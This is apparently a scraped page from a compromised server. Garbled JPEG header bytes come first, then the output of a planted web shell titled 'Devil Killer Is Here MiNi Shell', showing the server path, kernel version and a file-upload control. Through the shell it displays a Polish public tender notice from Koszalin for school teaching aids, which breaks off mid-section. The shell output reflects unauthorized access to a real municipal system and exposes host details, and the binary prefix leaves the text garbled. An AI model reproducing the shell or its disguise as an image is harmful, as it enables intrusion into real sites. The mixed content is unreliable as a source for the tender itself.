JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241206/0063901101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup pomocy dydaktycznych w ramach projektu „Program poprawy jakości <br/>kształcenia ogólnego w Koszalinie” (...) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Koszalin - Urząd Miejski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330920802</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek Staromiejski 6-7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koszalin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">75-007</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 94 348 86 54</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">anna.niedzialek@um.koszalin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.koszalin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Gmina Miasto Koszalin - UM w Koszalinie na rzecz: 1) SP nr 3 w Koszalinie, 2) SP nr 4 w Koszalinie, 3) SP nr 6 w Koszalinie, 4) SP nr 7 w Koszalinie, 5) SP nr 10 w Koszalinie, 6) SP nr 17 w Koszalinie, 7) SP nr 18 w Koszalinie, 8) I LO w Koszalinie</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">330920802</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Rynek Staromiejski</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Koszalin</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">75-007</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">+48 94 348 86 54</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">anna.niedzialek@um.koszalin.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://bip.koszalin.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup pomocy dydaktycznych w ramach projektu „Program poprawy jakości <br/>kształcenia ogólnego w Koszalinie” (...) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c9e4382d-e4bf-48c7-90b3-e6e2008a0ba8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00639011</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Program poprawy jakości kształcenia ogólnego w Koszalinie” współfinansowany ze środków Europejskiego Funduszu Społecznego Plus w ramach Działania 6.9 Programu Fundusze Europejskie dla Pomorza Zachodniego na lata 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c9e4382d-e4bf-48c7-90b3-e6e2008a0ba8 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem:<br/>https://ezamowienia.gov.pl (korzystanie z Platformy e-Zamówienia jest bezpłatne) oraz poczty elektronicznej: anna.niedzialek@um.koszalin.pl, z zastrzeżeniem:<br/>1) ppkt 1.2 w pkt 10 Rozdziału I SWZ;<br/>2) ppkt 1 w pkt 14 Rozdziału I SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Wyk składa ofertę za pośredn zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wyk. 2) Komunikacja w postępowaniu o udzielenie zam publ (z wyłączeniem składania ofert – sposób przygotowania oferty został szczegółowo opisany w Rozdziale I pkt 13 SWZ, a sposób złożenia oferty został szczegółowo opisany w Rozdziale I pkt 14 SWZ) odbywa się drogą elektr za pośredn: 2.1) „Formularzy do komunikacji” dostępnych na Platformie e-Zamówienia w zakładce „Formularze”; maks rozmiar plików przesyłanych<br/>za pośredn Formularzy do komunikacji” wynosi 25 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza) lub 2.2) poczty elektr, na adres e-mail: anna.niedzialek@um.koszalin.pl; przy komunik za pośredn poczty elektr Zam lub Wyk na żądanie drugiej strony niezwłocznie potwierdza fakt otrzymania wiadomości; w przypadku niepotwierdzenia ze strony Wyk odbioru przesłanych wiadomości (pomimo takiego żądania) Zam uzna, że wiadomość została skutecznie przekazana do Wyk. 3) Wyk zamierzający wziąć udział w postęp o udzielenie zam publ musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określają: Regulamin Platformy e-Zamówienia dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum pomocy”. Uwaga: Przeglądanie i pobieranie publicznej treści dokumentacji<br/>postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dot treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. 4) We wszelkiej korespondencji związanej z niniejszym postęp Wyk posługują się sygnaturą postęp, tj. BZP-9.271.1.36.2024.AN. 5) Min wymagania techniczne dot sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dot specyfikacji<br/>połączenia określa Regulamin Platformy e-Zamówienia. 6) W przypadku problemów techn i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia techn dostępnego poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”. 7) Ofertę, Oświadczenie składane na podstawie art. 125 ust. 1 ustawy PZP, Podmiotowe środki dowodowe, w tym Oświadczenie składane na podstawie art. 117 ust. 4 ustawy PZP, oraz Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia, Przedmiotowe środki dowodowe, Pełnomocnictwo sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17.02.2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne (Dz. U. z 2024 r., poz. 307), z uwzględnieniem rodzaju przekazywanych danych. 8) Informacje, oświadczenia lub dokumenty inne niż określone w ppkt 7, przekazywane w postępowaniu, sporządza się w postaci elektr, w formatach danych określonych w przepisach wydanych na podstawie ww. art. 18 ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunik elektr, o których mowa w ppkt 2. 9) Zam dopuszcza w szczególności następujący format przesyłanych danych: .pdf, .doc, .docx, .rtf, .xps, .odt., txt. 10) Maks łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250<br/>MB. 11) Ofertę składa się, pod rygorem nieważności, w formie elektr opatrzonej kwalif podpisem elektr lub w postaci elektr opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego i Rady<br/>(UE) 2016/679 z dnia 27 kwietnia 2016 roku (RODO) uprzejmie informujemy, że:<br/>1) administratorem Pani/Pana danych jest Gmina Miasto Koszalin reprezentowana przez Prezydenta Miasta Koszalina – Urząd Miejski ul. Rynek Staromiejski 6-7, e-mail: um.koszalin@um.koszalin.pl;<br/>2) w Urzędzie Miejskim w Koszalinie został wyznaczony Inspektor Ochrony Danych: Mariusz Krasicki Urząd Miejski ul. Rynek Staromiejski 6-7, e-mail: iodo@um.koszalin.pl;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy PZP;<br/>5) Pani/Pana dane osobowe będą przechowywane do czasu osiągnięcia celu, w jakim je pozyskaliśmy; kryteria ustalania czasu, w którym dane osobowe przetwarzane na podstawie przepisów prawa będą przechowywane określa Rozporządzenie Prezesa Rady<br/>Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (Dz. U. z 2011 r. Nr 14, poz. 67 z późn. zm.);<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany;<br/>8) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących *;<br/>− na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) Pani/Pana dane osobowe nie będą przekazywane do państw trzecich lub organizacji międzynarodowych.<br/>___________________________________________________________________________________<br/>* Wyjaśnienie: w przypadku skorzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 RODO, Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia,<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu postępowania oraz jego załączników,<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Patrz: punkt 3.15.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP-9.271.1.36.2024.AN</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 576227,57 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zadanie obejmuje dostawę pomocy dydaktycznych bezpośrednio do Szkoły Podstawowej nr 3 <br/>im. ks. Jana Twardowskiego w Koszalinie, ul. Jabłoniowa 23, 75-679 Koszalin. <br/>2. Szczegółowy zakres rzeczowy obejmuje dostawę:<br/>- komputerów przenośnych w liczbie 8 szt.<br/>- drukarki w liczbie 1 szt. <br/>- monitorów interaktywnych w liczbie 7 szt. <br/>- projektorów w ilości 2 szt. <br/>3. Szczegółowe określenie przedmiotu zamówienia dla Zadania nr 1 zawarte jest w Rozdziale II SWZ oraz w projekcie umowy zawartym w Rozdziale V SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 107190,07 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30231320-6 - Monitory dotykowe</p> <p class="mb-0">38652120-7 - Projektory wideo</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagą: <br/><br/>1) Cena (C) – 60%<br/>2) Przedłużenie okresu gwarancji (G) – 35%<br/>3) Klauzula społeczna (S) – 5% <br/><br/>Ocena ofert (O) zostanie przeprowadzona w oparciu o przedstawione kryteria oraz ich wagę. <br/>Oferty oceniane będą punktowo w przyjętej skali 100 pkt. <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, według wzoru: O = C + G+ S.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Klauzula społeczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zakres zadania obejmuje dostawę pomocy dydaktycznych bezpośrednio do Szkoły Podstawowej nr 4 im. Zdobywców Kosmosu w Koszalinie, ul. Podgórna 45, 75-321 Koszalin. <br/>2. Szczegółowy zakres rzeczowy obejmuje dostawę:<br/>- drukarki w liczbie 1 szt.<br/>3. Szczegółowe określenie przedmiotu zamówienia dla Zadania nr 2 zawarte jest w Rozdziale II SWZ oraz w projekcie umowy zawartym w Rozdziale V SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 1504,97 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30232130-4 - Kolorowe drukarki atramentowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagą: <br/><br/>1) Cena (C) – 60%<br/>2) Przedłużenie okresu gwarancji (G) – 35%<br/>3) Klauzula społeczna (S) – 5% <br/><br/>Ocena ofert (O) zostanie przeprowadzona w oparciu o przedstawione kryteria oraz ich wagę. <br/>Oferty oceniane będą punktowo w przyjętej skali 100 pkt. <br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku, według wzoru: O = C + G+ S.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Klauzula społeczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje 